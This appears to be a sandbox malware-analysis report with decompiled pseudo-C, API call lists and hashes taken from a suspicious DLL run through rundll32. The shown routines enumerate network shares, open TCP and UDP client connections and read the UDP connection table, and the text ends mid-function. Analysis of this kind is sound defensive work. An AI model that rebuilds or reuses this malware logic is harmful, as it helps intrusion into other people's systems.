                                                            0x046348e3
                                                            0x046348bc
                                                            0x046348bf
                                                            0x046348d9
                                                            0x00000000
                                                            0x046348c1
                                                            0x046348c2
                                                            0x046348ce
                                                            0x046348ce
                                                            0x046348bf
                                                            0x046347f9
                                                            0x046347ff
                                                            0x046347ff
                                                            0x046347ce
                                                            0x046347d4
                                                            0x046347d4

                                                            APIs
                                                            • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 046347C4
                                                            • LocalAlloc.KERNEL32(00000040,00000400,74CB69A0,?), ref: 046347E4
                                                            • LocalAlloc.KERNEL32(00000040,00004000), ref: 046347EE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocLocal$EnumOpen
                                                            • String ID:
                                                            • API String ID: 2229625058-0
                                                            • Opcode ID: ed22459b25ab1250da1e01999d5b11c8499a21b1303b0328d0f7dbcebb03576e
                                                            • Instruction ID: 242f3e4c74a42844f46185722feca8577ccccbb4a506f01ca6a711911b892612
                                                            • Opcode Fuzzy Hash: ed22459b25ab1250da1e01999d5b11c8499a21b1303b0328d0f7dbcebb03576e
                                                            • Instruction Fuzzy Hash: 68418471A00119EFDB10DFD9EC84AADF7B9FF44762F1102A6E908E7250EB355E108B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0466BCDF(intOrPtr _a4) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _t25;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr _t28;
                                                            				intOrPtr* _t29;
                                                            				intOrPtr* _t31;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr* _t46;
                                                            				intOrPtr* _t47;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr* _t70;
                                                            				intOrPtr _t74;
                                                            
                                                            				_t74 = _a4;
                                                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                            				if(_t25 != 0 && _t25 != 0x46846f0) {
                                                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                            					if(_t45 != 0 &&  *_t45 == 0) {
                                                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                            						if(_t46 != 0 &&  *_t46 == 0) {
                                                            							E046684AD(_t46);
                                                            							E0466BFF3( *((intOrPtr*)(_t74 + 0x88)));
                                                            						}
                                                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                            						if(_t47 != 0 &&  *_t47 == 0) {
                                                            							E046684AD(_t47);
                                                            							E0466C0F1( *((intOrPtr*)(_t74 + 0x88)));
                                                            						}
                                                            						E046684AD( *((intOrPtr*)(_t74 + 0x7c)));
                                                            						E046684AD( *((intOrPtr*)(_t74 + 0x88)));
                                                            					}
                                                            				}
                                                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                            				if(_t26 != 0 &&  *_t26 == 0) {
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x8c)));
                                                            				}
                                                            				E0466BE52( *((intOrPtr*)(_t74 + 0x9c)));
                                                            				_t28 = 6;
                                                            				_t16 = _t74 + 0xa0; // 0xa1
                                                            				_t55 = _t16;
                                                            				_v8 = _t28;
                                                            				_t18 = _t74 + 0x28; // 0x29
                                                            				_t70 = _t18;
                                                            				do {
                                                            					if( *((intOrPtr*)(_t70 - 8)) != 0x4684100) {
                                                            						_t31 =  *_t70;
                                                            						if(_t31 != 0 &&  *_t31 == 0) {
                                                            							E046684AD(_t31);
                                                            							E046684AD( *_t55);
                                                            						}
                                                            						_t28 = _v8;
                                                            					}
                                                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                            						if(_t29 != 0 &&  *_t29 == 0) {
                                                            							E046684AD(_t29);
                                                            						}
                                                            						_t28 = _v8;
                                                            					}
                                                            					_t55 = _t55 + 4;
                                                            					_t70 = _t70 + 0x10;
                                                            					_t28 = _t28 - 1;
                                                            					_v8 = _t28;
                                                            				} while (_t28 != 0);
                                                            				return E046684AD(_t74);
                                                            			}















                                                            0x0466bce7
                                                            0x0466bceb
                                                            0x0466bcf3
                                                            0x0466bcfc
                                                            0x0466bd01
                                                            0x0466bd08
                                                            0x0466bd10
                                                            0x0466bd18
                                                            0x0466bd23
                                                            0x0466bd29
                                                            0x0466bd2a
                                                            0x0466bd32
                                                            0x0466bd3a
                                                            0x0466bd45
                                                            0x0466bd4b
                                                            0x0466bd4f
                                                            0x0466bd5a
                                                            0x0466bd60
                                                            0x0466bd01
                                                            0x0466bd61
                                                            0x0466bd69
                                                            0x0466bd7c
                                                            0x0466bd8f
                                                            0x0466bd9d
                                                            0x0466bda8
                                                            0x0466bdad
                                                            0x0466bdb6
                                                            0x0466bdbe
                                                            0x0466bdbf
                                                            0x0466bdbf
                                                            0x0466bdc5
                                                            0x0466bdc8
                                                            0x0466bdc8
                                                            0x0466bdcb
                                                            0x0466bdd2
                                                            0x0466bdd4
                                                            0x0466bdd8
                                                            0x0466bde0
                                                            0x0466bde7
                                                            0x0466bded
                                                            0x0466bdee
                                                            0x0466bdee
                                                            0x0466bdf5
                                                            0x0466bdf7
                                                            0x0466bdfc
                                                            0x0466be04
                                                            0x0466be09
                                                            0x0466be0a
                                                            0x0466be0a
                                                            0x0466be0d
                                                            0x0466be10
                                                            0x0466be13
                                                            0x0466be16
                                                            0x0466be16
                                                            0x0466be28

                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0466BD23
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C010
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C022
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C034
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C046
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C058
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C06A
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C07C
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C08E
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0A0
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0B2
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0C4
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0D6
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0E8
                                                            • _free.LIBCMT ref: 0466BD18
                                                              • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
                                                              • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
                                                            • _free.LIBCMT ref: 0466BD3A
                                                            • _free.LIBCMT ref: 0466BD4F
                                                            • _free.LIBCMT ref: 0466BD5A
                                                            • _free.LIBCMT ref: 0466BD7C
                                                            • _free.LIBCMT ref: 0466BD8F
                                                            • _free.LIBCMT ref: 0466BD9D
                                                            • _free.LIBCMT ref: 0466BDA8
                                                            • _free.LIBCMT ref: 0466BDE0
                                                            • _free.LIBCMT ref: 0466BDE7
                                                            • _free.LIBCMT ref: 0466BE04
                                                            • _free.LIBCMT ref: 0466BE1C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: f9eb848fe3519931447807340796eb2b680421c9b423823b6796cb224ce0ebd4
                                                            • Instruction ID: f85e9d4ed88d9c134386b83611d85a756c475ab91258cdfc56963ba0ab637078
                                                            • Opcode Fuzzy Hash: f9eb848fe3519931447807340796eb2b680421c9b423823b6796cb224ce0ebd4
                                                            • Instruction Fuzzy Hash: A2314A31600315DFEB21AA39EC44B5AB3E8EF50764F14882EE85ADF250FE31F8818B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0464ECE0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				signed int _v8;
                                                            				char _v36;
                                                            				char _v64;
                                                            				long _v68;
                                                            				intOrPtr _v72;
                                                            				signed int _t47;
                                                            				long _t60;
                                                            				long _t61;
                                                            				signed int _t69;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t82;
                                                            				intOrPtr* _t105;
                                                            				signed int _t109;
                                                            
                                                            				_t47 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t47 ^ _t109;
                                                            				_t82 = _a4;
                                                            				_t105 = __ecx;
                                                            				_v72 = _a16;
                                                            				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
                                                            					L16:
                                                            					__eflags = _v8 ^ _t109;
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x148);
                                                            					_t113 =  *(__ecx + 0x50) - 3;
                                                            					if( *(__ecx + 0x50) != 3) {
                                                            						 *(__ecx + 0x48) = 1;
                                                            						SetLastError(0x139f);
                                                            						 *(_t105 + 0x148) = 0;
                                                            						goto L16;
                                                            					} else {
                                                            						 *(__ecx + 0x50) = 0;
                                                            						 *(__ecx + 0x148) = 0;
                                                            						 *((intOrPtr*)( *__ecx + 0xb4))();
                                                            						 *(__ecx + 0xc) = 1;
                                                            						_v36 = 0;
                                                            						_v64 = 0;
                                                            						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                            						 *(__ecx + 0x14) = 0;
                                                            						 *(__ecx + 0x18) = 1;
                                                            						_v68 = 0;
                                                            						_t60 = E0464EF50(_t82, __ecx, __ecx, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
                                                            						if(_t60 == 0) {
                                                            							__imp__#111();
                                                            							 *(__ecx + 0x48) = 3;
                                                            							goto L13;
                                                            						} else {
                                                            							_t60 = E0464DB70(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
                                                            							if(_t60 == 0) {
                                                            								__imp__#111();
                                                            								 *(__ecx + 0x48) = 4;
                                                            								L13:
                                                            								SetLastError(_t60);
                                                            								goto L14;
                                                            							} else {
                                                            								SetLastError(0);
                                                            								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                            								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
                                                            									_t69 = GetLastError();
                                                            									__eflags = _t69;
                                                            									_t70 =  ==  ? 0x4c7 : _t69;
                                                            									L0464EBB0(_t105, 5, "CTcpClient::Start",  ==  ? 0x4c7 : _t69);
                                                            									goto L14;
                                                            								} else {
                                                            									_t98 = _t105;
                                                            									if(E0464F0B0( &_v36, _t105,  &_v36, _a12) == 0) {
                                                            										__imp__#111();
                                                            										L0464EBB0(_t105, 0xb, "CTcpClient::Start", _t73);
                                                            										goto L14;
                                                            									} else {
                                                            										_t76 = E0465F897(_t98, 0, 0, E0464F190, _t105, 0, _t105 + 0x44);
                                                            										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
                                                            										if(_t76 == 0) {
                                                            											L0464EBB0(_t105, 8, "CTcpClient::Start", 0x65f);
                                                            											L14:
                                                            											 *(_t105 + 0xc) = 0;
                                                            											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                            											 *(_t105 + 0x14) = 0;
                                                            											 *(_t105 + 0x18) = 1;
                                                            											_t61 = GetLastError();
                                                            											 *((intOrPtr*)( *_t105 + 4))();
                                                            											SetLastError(_t61);
                                                            											__eflags = _v8 ^ _t109;
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										} else {
                                                            											_v68 = 1;
                                                            											ResetEvent( *(_t105 + 4));
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
















                                                            0x0464ece6
                                                            0x0464eced
                                                            0x0464ecf4
                                                            0x0464ecf9
                                                            0x0464ecfb
                                                            0x0464ed08
                                                            0x0464eee7
                                                            0x0464eeee
                                                            0x0464eef9
                                                            0x0464ed0e
                                                            0x0464ed14
                                                            0x0464ed19
                                                            0x0464ed1d
                                                            0x0464eed0
                                                            0x0464eed7
                                                            0x0464eedd
                                                            0x00000000
                                                            0x0464ed23
                                                            0x0464ed23
                                                            0x0464ed2c
                                                            0x0464ed38
                                                            0x0464ed40
                                                            0x0464ed47
                                                            0x0464ed4d
                                                            0x0464ed5b
                                                            0x0464ed65
                                                            0x0464ed6e
                                                            0x0464ed75
                                                            0x0464ed7c
                                                            0x0464ed89
                                                            0x0464ee75
                                                            0x0464ee7b
                                                            0x00000000
                                                            0x0464ed8f
                                                            0x0464ed9c
                                                            0x0464eda3
                                                            0x0464ee66
                                                            0x0464ee6c
                                                            0x0464ee82
                                                            0x0464ee89
                                                            0x00000000
                                                            0x0464eda9
                                                            0x0464edb1
                                                            0x0464edb7
                                                            0x0464edc0
                                                            0x0464ee49
                                                            0x0464ee4b
                                                            0x0464ee52
                                                            0x0464ee5f
                                                            0x00000000
                                                            0x0464edc6
                                                            0x0464edcc
                                                            0x0464edd6
                                                            0x0464ee32
                                                            0x0464ee42
                                                            0x00000000
                                                            0x0464edd8
                                                            0x0464ede8
                                                            0x0464edf0
                                                            0x0464edf5
                                                            0x0464ee2b
                                                            0x0464ee8b
                                                            0x0464ee8b
                                                            0x0464ee92
                                                            0x0464ee99
                                                            0x0464eea0
                                                            0x0464eea7
                                                            0x0464eeaf
                                                            0x0464eeb3
                                                            0x0464eebe
                                                            0x0464eec8
                                                            0x0464edf7
                                                            0x0464edfa
                                                            0x0464ee01
                                                            0x0464ee1a
                                                            0x0464ee1a
                                                            0x0464edf5
                                                            0x0464edd6
                                                            0x0464edc0
                                                            0x0464eda3
                                                            0x0464ed89
                                                            0x0464ed1d

                                                            APIs
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • SetLastError.KERNEL32(0000139F), ref: 0464EED7
                                                              • Part of subcall function 0464EF50: WSASetLastError.WS2_32(0000273F,?,?), ref: 0464EFD6
                                                            • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 0464EDB1
                                                            • GetLastError.KERNEL32 ref: 0464EE49
                                                              • Part of subcall function 0464F0B0: WSAEventSelect.WS2_32(?,?,00000030), ref: 0464F0C4
                                                              • Part of subcall function 0464F0B0: connect.WS2_32(?,?,00000010), ref: 0464F0EC
                                                              • Part of subcall function 0464F0B0: WSAGetLastError.WS2_32 ref: 0464F0FF
                                                            • ResetEvent.KERNEL32(?), ref: 0464EE01
                                                            • WSAGetLastError.WS2_32(?,00000005), ref: 0464EE32
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 0464EE66
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 0464EE75
                                                            • SetLastError.KERNEL32(00000000), ref: 0464EE89
                                                            • GetLastError.KERNEL32 ref: 0464EEA7
                                                            • SetLastError.KERNEL32(00000000), ref: 0464EEB3
                                                              • Part of subcall function 0464DB70: htons.WS2_32(?), ref: 0464DBDE
                                                              • Part of subcall function 0464DB70: bind.WS2_32(?,00000002,0000001C), ref: 0464DC02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                            • String ID: CTcpClient::Start
                                                            • API String ID: 4138520258-3740072585
                                                            • Opcode ID: cb28e017a907f16c916120d027ff05488690b31b2f86b2f87073255edd70d345
                                                            • Instruction ID: a88fda4ca4ccabc4289d32fb78975ebbddb060b9041c8760b723d912db7b31f4
                                                            • Opcode Fuzzy Hash: cb28e017a907f16c916120d027ff05488690b31b2f86b2f87073255edd70d345
                                                            • Instruction Fuzzy Hash: 33516370700609EFEB14DFA5D888B9EBBB9FF88305F000119E506D7291EB76B914CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0464D790(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				signed int _v8;
                                                            				char _v36;
                                                            				char _v64;
                                                            				long _v68;
                                                            				intOrPtr _v72;
                                                            				void* __ebp;
                                                            				signed int _t47;
                                                            				long _t60;
                                                            				long _t61;
                                                            				signed int _t69;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t82;
                                                            				intOrPtr* _t105;
                                                            				signed int _t109;
                                                            
                                                            				_t47 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t47 ^ _t109;
                                                            				_t82 = _a4;
                                                            				_t105 = __ecx;
                                                            				_v72 = _a16;
                                                            				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
                                                            					L16:
                                                            					__eflags = _v8 ^ _t109;
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x148);
                                                            					_t113 =  *(__ecx + 0x50) - 3;
                                                            					if( *(__ecx + 0x50) != 3) {
                                                            						 *(__ecx + 0x48) = 1;
                                                            						SetLastError(0x139f);
                                                            						 *(_t105 + 0x148) = 0;
                                                            						goto L16;
                                                            					} else {
                                                            						 *(__ecx + 0x50) = 0;
                                                            						 *(__ecx + 0x148) = 0;
                                                            						 *((intOrPtr*)( *__ecx + 0xb4))();
                                                            						 *(__ecx + 0xc) = 1;
                                                            						_v36 = 0;
                                                            						_v64 = 0;
                                                            						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                            						 *(__ecx + 0x14) = 0;
                                                            						 *(__ecx + 0x18) = 1;
                                                            						_v68 = 0;
                                                            						_t60 = E0464DA30(_t82, __ecx, __ecx, __esi, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
                                                            						if(_t60 == 0) {
                                                            							__imp__#111();
                                                            							 *(__ecx + 0x48) = 3;
                                                            							goto L13;
                                                            						} else {
                                                            							_t60 = E0464DB70(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
                                                            							if(_t60 == 0) {
                                                            								__imp__#111();
                                                            								 *(__ecx + 0x48) = 4;
                                                            								L13:
                                                            								SetLastError(_t60);
                                                            								goto L14;
                                                            							} else {
                                                            								SetLastError(0);
                                                            								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                            								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
                                                            									_t69 = GetLastError();
                                                            									__eflags = _t69;
                                                            									_t70 =  ==  ? 0x4c7 : _t69;
                                                            									L0464EBB0(_t105, 5, "CUdpClient::Start",  ==  ? 0x4c7 : _t69);
                                                            									goto L14;
                                                            								} else {
                                                            									_push(_a12);
                                                            									_t98 = _t105;
                                                            									if(E0464DCA0( &_v36, SetLastError, _t105, _t105,  &_v36) == 0) {
                                                            										__imp__#111();
                                                            										L0464EBB0(_t105, 0xb, "CUdpClient::Start", _t73);
                                                            										goto L14;
                                                            									} else {
                                                            										_t76 = E0465F897(_t98, 0, 0,  &M0464DDE0, _t105, 0, _t105 + 0x44);
                                                            										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
                                                            										if(_t76 == 0) {
                                                            											L0464EBB0(_t105, 8, "CUdpClient::Start", 0x65f);
                                                            											L14:
                                                            											 *(_t105 + 0xc) = 0;
                                                            											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                            											 *(_t105 + 0x14) = 0;
                                                            											 *(_t105 + 0x18) = 1;
                                                            											_t61 = GetLastError();
                                                            											 *((intOrPtr*)( *_t105 + 4))();
                                                            											SetLastError(_t61);
                                                            											__eflags = _v8 ^ _t109;
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										} else {
                                                            											_v68 = 1;
                                                            											ResetEvent( *(_t105 + 4));
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

















                                                            0x0464d796
                                                            0x0464d79d
                                                            0x0464d7a4
                                                            0x0464d7a9
                                                            0x0464d7ab
                                                            0x0464d7b8
                                                            0x0464d997
                                                            0x0464d99e
                                                            0x0464d9a9
                                                            0x0464d7be
                                                            0x0464d7c4
                                                            0x0464d7c9
                                                            0x0464d7cd
                                                            0x0464d980
                                                            0x0464d987
                                                            0x0464d98d
                                                            0x00000000
                                                            0x0464d7d3
                                                            0x0464d7d3
                                                            0x0464d7dc
                                                            0x0464d7e8
                                                            0x0464d7f0
                                                            0x0464d7f7
                                                            0x0464d7fd
                                                            0x0464d80b
                                                            0x0464d815
                                                            0x0464d81e
                                                            0x0464d825
                                                            0x0464d82c
                                                            0x0464d839
                                                            0x0464d925
                                                            0x0464d92b
                                                            0x00000000
                                                            0x0464d83f
                                                            0x0464d84c
                                                            0x0464d853
                                                            0x0464d916
                                                            0x0464d91c
                                                            0x0464d932
                                                            0x0464d939
                                                            0x00000000
                                                            0x0464d859
                                                            0x0464d861
                                                            0x0464d867
                                                            0x0464d870
                                                            0x0464d8f9
                                                            0x0464d8fb
                                                            0x0464d902
                                                            0x0464d90f
                                                            0x00000000
                                                            0x0464d876
                                                            0x0464d876
                                                            0x0464d87c
                                                            0x0464d886
                                                            0x0464d8e2
                                                            0x0464d8f2
                                                            0x00000000
                                                            0x0464d888
                                                            0x0464d898
                                                            0x0464d8a0
                                                            0x0464d8a5
                                                            0x0464d8db
                                                            0x0464d93b
                                                            0x0464d93b
                                                            0x0464d942
                                                            0x0464d949
                                                            0x0464d950
                                                            0x0464d957
                                                            0x0464d95f
                                                            0x0464d963
                                                            0x0464d96e
                                                            0x0464d978
                                                            0x0464d8a7
                                                            0x0464d8aa
                                                            0x0464d8b1
                                                            0x0464d8ca
                                                            0x0464d8ca
                                                            0x0464d8a5
                                                            0x0464d886
                                                            0x0464d870
                                                            0x0464d853
                                                            0x0464d839
                                                            0x0464d7cd

                                                            APIs
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • SetLastError.KERNEL32(0000139F), ref: 0464D987
                                                              • Part of subcall function 0464DA30: WSASetLastError.WS2_32(0000273F,?,?), ref: 0464DAB6
                                                            • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 0464D861
                                                            • GetLastError.KERNEL32 ref: 0464D8F9
                                                              • Part of subcall function 0464DCA0: WSAEventSelect.WS2_32(?,?,00000030), ref: 0464DCB6
                                                              • Part of subcall function 0464DCA0: connect.WS2_32(?,?,00000010), ref: 0464DCDE
                                                              • Part of subcall function 0464DCA0: WSAGetLastError.WS2_32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DCF1
                                                            • ResetEvent.KERNEL32(?), ref: 0464D8B1
                                                            • WSAGetLastError.WS2_32(?,00000005), ref: 0464D8E2
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 0464D916
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 0464D925
                                                            • SetLastError.KERNEL32(00000000), ref: 0464D939
                                                            • GetLastError.KERNEL32 ref: 0464D957
                                                            • SetLastError.KERNEL32(00000000), ref: 0464D963
                                                              • Part of subcall function 0464DB70: htons.WS2_32(?), ref: 0464DBDE
                                                              • Part of subcall function 0464DB70: bind.WS2_32(?,00000002,0000001C), ref: 0464DC02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                            • String ID: CUdpClient::Start
                                                            • API String ID: 4138520258-3951387650
                                                            • Opcode ID: d256fc6f73b24e58d02940aba5ef33c89e9cd66a59b9728322932c14f2b7f3fd
                                                            • Instruction ID: 5a1dcf65ca7088c357fc1b2d093fd34c44c10fe9dca8734b51031fe1dd06b2ea
                                                            • Opcode Fuzzy Hash: d256fc6f73b24e58d02940aba5ef33c89e9cd66a59b9728322932c14f2b7f3fd
                                                            • Instruction Fuzzy Hash: 95515570B00609EFEB14EFA5D888BAEB7B9FF88304F000119E506D7691EB75B915CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0463D980(void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v16;
                                                            				short _v540;
                                                            				_Unknown_base(*)()* _v544;
                                                            				char _v548;
                                                            				signed int* _v552;
                                                            				long _v556;
                                                            				long _v560;
                                                            				intOrPtr _v576;
                                                            				_Unknown_base(*)() _v592;
                                                            				intOrPtr _v596;
                                                            				long _v600;
                                                            				long _v604;
                                                            				signed int _t44;
                                                            				struct HINSTANCE__* _t46;
                                                            				_Unknown_base(*)()* _t49;
                                                            				void* _t50;
                                                            				signed int* _t51;
                                                            				signed int* _t55;
                                                            				int _t67;
                                                            				signed int _t75;
                                                            				_Unknown_base(*)()* _t85;
                                                            				intOrPtr _t86;
                                                            				long _t87;
                                                            				intOrPtr _t91;
                                                            				long _t93;
                                                            				void* _t96;
                                                            				signed int* _t100;
                                                            				void* _t101;
                                                            				signed int _t106;
                                                            				void* _t109;
                                                            				signed int _t112;
                                                            				void* _t113;
                                                            				void* _t116;
                                                            				void* _t120;
                                                            
                                                            				_t112 = (_t109 - 0x00000008 & 0xfffffff0) + 4;
                                                            				_v8 =  *((intOrPtr*)(_t109 + 4));
                                                            				_t106 = _t112;
                                                            				_t113 = _t112 - 0x258;
                                                            				_t44 =  *0x4684008; // 0xd355be4e
                                                            				_v16 = _t44 ^ _t106;
                                                            				_push(__esi);
                                                            				_t93 = 0;
                                                            				_v604 = 0;
                                                            				_v600 = 0;
                                                            				_t46 = LoadLibraryA("iphlpapi.dll");
                                                            				if(_t46 == 0) {
                                                            					L4:
                                                            					return E04655AFE(_v16 ^ _t106);
                                                            				} else {
                                                            					_t49 = GetProcAddress(_t46, "GetExtendedUdpTable");
                                                            					_v544 = _t49;
                                                            					_v548 = 0;
                                                            					_t50 =  *_t49(0,  &_v548, 1, 2, 1, 0);
                                                            					_t123 = _t50 - 0x7a;
                                                            					if(_t50 != 0x7a) {
                                                            						goto L4;
                                                            					} else {
                                                            						_push(_v548);
                                                            						_t51 = L04655B55( &_v548, __esi, _t123);
                                                            						_t116 = _t113 + 4;
                                                            						_t100 = _t51;
                                                            						_v552 = _t100;
                                                            						_push(0);
                                                            						_push(1);
                                                            						_push(2);
                                                            						_push(1);
                                                            						_push( &_v548);
                                                            						_push(_t100);
                                                            						if(_v544() == 0) {
                                                            							_t101 = LocalAlloc(0x40, 0x2800);
                                                            							_v556 = 0;
                                                            							_t55 = _v552;
                                                            							__eflags =  *_t55;
                                                            							if( *_t55 > 0) {
                                                            								_t85 =  &(_t55[2]);
                                                            								_v544 = _t85;
                                                            								do {
                                                            									_v596 =  *((intOrPtr*)(_t85 - 4));
                                                            									_t86 =  *((intOrPtr*)(_t85 + 4));
                                                            									_push(_t86);
                                                            									_v592 =  *_t85;
                                                            									_v576 = _t86;
                                                            									E0463D4D0(_t86,  &_v540);
                                                            									_t120 = _t116 + 4;
                                                            									_v560 = 0x22 + lstrlenW( &_v540) * 2 + _t93;
                                                            									_t67 = LocalSize(_t101);
                                                            									_t87 = _v560;
                                                            									__eflags = _t67 - _t87;
                                                            									if(_t67 < _t87) {
                                                            										_t101 = LocalReAlloc(_t101, _t87, 0x42);
                                                            									}
                                                            									asm("movups xmm0, [ebp-0x250]");
                                                            									asm("movups [edi+esi], xmm0");
                                                            									asm("movups xmm0, [ebp-0x240]");
